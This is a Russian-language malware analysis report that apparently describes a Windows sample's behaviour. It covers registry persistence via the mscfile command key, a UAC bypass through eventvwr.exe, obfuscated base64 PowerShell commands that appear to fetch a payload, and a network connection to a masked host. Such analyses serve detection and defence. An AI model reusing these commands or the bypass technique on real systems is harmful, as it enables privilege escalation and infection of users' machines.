Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [HKCU\Software\Classes\mscfile\shell\open\command] '' = 'cmd /c cd %temp% && p^o^wer^sh^ell^.e^xe -enc JABUAGUAbQBwAEQAaQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFQAZQ...
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\eventvwr.exe'
Сетевая активность
Подключается к
- 'ku###.isikun.edu.tr':80
UDP
- DNS ASK ku###.isikun.edu.tr
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\eventvwr.exe' ' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c cd %LOCALAPPDATA%\Temp && p^o^wer^sh^ell^.e^xe -enc JABUAGUAbQBwAEQAaQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFQAZQBtAHAAUABhAHQAaAAoACkAOwAgACgATgBlAHcALQBPAGIAag...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c cd %LOCALAPPDATA%\Temp && p^o^wer^sh^ell^.e^xe -enc JABUAGUAbQBwAEQAaQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFQAZQBtAHAAUABhAHQAaAAoACkAOwAgACgATgBlAHcALQBPAGIAag...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc JABUAGUAbQBwAEQAaQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFQAZQBtAHAAUABhAHQAaAAoACkAOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBD...
